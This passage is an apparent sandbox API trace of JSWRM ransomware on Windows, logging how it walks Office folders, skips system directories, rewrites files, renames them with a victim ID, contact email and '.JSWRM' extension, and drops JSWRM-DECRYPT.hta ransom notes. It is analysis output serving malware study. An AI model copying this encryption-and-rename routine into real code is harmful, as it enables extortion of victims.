dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0112.236] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.236] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0112.237] CloseHandle (hObject=0x458) returned 1 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0112.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0112.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0112.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0112.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0112.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0112.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\loc\\jswrm-decrypt.hta")) returned 0x20 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0112.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0112.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0112.238] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x983c2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0112.238] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.238] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x983c2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0112.238] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.238] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.238] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x983c2c8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x983c2c8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9862502, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2667, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppXManifestLoc.en-us.xml", cAlternateFileName="APPXMA~1.XML")) returned 1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2=".") returned 1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="..") returned 1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="...") returned 1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="windows") returned -1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="recovery") returned -1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="perflogs") returned -1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="documents and settings") returned -1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="$RECYCLE.BIN") returned 1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="system volume information") returned -1 [0112.238] lstrcmpiW (lpString1="AppXManifestLoc.en-us.xml", lpString2="msocache") returned -1 [0112.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0112.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x2412b8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifestLoc.en-us.xml", lpUsedDefaultChar=0x0) returned 25 [0112.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0112.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0112.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifestLoc.en-us.xml", cchWideChar=25, lpMultiByteStr=0x241358, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifestLoc.en-us.xml", lpUsedDefaultChar=0x0) returned 25 [0112.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0112.239] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0112.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0112.239] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\loc\\appxmanifestloc.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.240] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9831) returned 1 [0112.240] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.240] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2660) returned 0x24c1d0 [0112.240] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2660, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2660, lpOverlapped=0x0) returned 1 [0112.242] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.242] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2660, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2660, lpOverlapped=0x0) returned 1 [0112.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.242] CloseHandle (hObject=0x45c) returned 1 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0112.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0112.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0112.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0112.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0112.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\AppXManifestLoc.en-us.xml" (normalized: "c:\\program files\\microsoft office\\root\\loc\\appxmanifestloc.en-us.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\loc\\AppXManifestLoc.en-us.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\loc\\appxmanifestloc.en-us.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0112.244] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x398fa292, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x398fa292, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0112.244] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0112.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0112.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0112.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0112.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0112.245] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x398fa292, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x398fa292, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0112.245] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0112.245] FindNextFileW (in: hFindFile=0x232200, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="mcxml", cAlternateFileName="")) returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2=".") returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="..") returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="...") returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="windows") returned -1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="recovery") returned -1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="perflogs") returned -1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="documents and settings") returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="$RECYCLE.BIN") returned 1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="system volume information") returned -1 [0112.245] lstrcmpiW (lpString1="mcxml", lpString2="msocache") returned -1 [0112.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0112.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0112.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0112.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217eb0 [0112.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0112.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\jswrm-decrypt.hta")) returned 0xffffffff [0112.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217eb0 | out: hHeap=0x1e0000) returned 1 [0112.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0112.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0112.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0112.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0112.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0112.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0112.246] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217300 [0112.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0112.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0112.247] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.247] WriteFile (in: hFile=0x458, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0112.248] CloseHandle (hObject=0x458) returned 1 [0112.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217300 | out: hHeap=0x1e0000) returned 1 [0112.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.248] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0112.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ae0 [0112.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0112.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0112.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0112.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217bf0 [0112.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0112.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\jswrm-decrypt.hta")) returned 0x20 [0112.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217bf0 | out: hHeap=0x1e0000) returned 1 [0112.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0112.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0112.249] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0112.249] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0112.249] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0x398fa292, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="..", cAlternateFileName="")) returned 1 [0112.249] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0112.249] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0112.249] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaac403, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaac403, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf71003, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xec40, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AppVIsvSubsystems32.dll", cAlternateFileName="APPVIS~2.DLL")) returned 1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2=".") returned 1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="..") returned 1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="...") returned 1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="windows") returned -1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="recovery") returned -1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="perflogs") returned -1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="documents and settings") returned -1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="$RECYCLE.BIN") returned 1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="system volume information") returned -1 [0112.249] lstrcmpiW (lpString1="AppVIsvSubsystems32.dll", lpString2="msocache") returned -1 [0112.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0112.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0112.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppVIsvSubsystems32.dll", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppVIsvSubsystems32.dll", 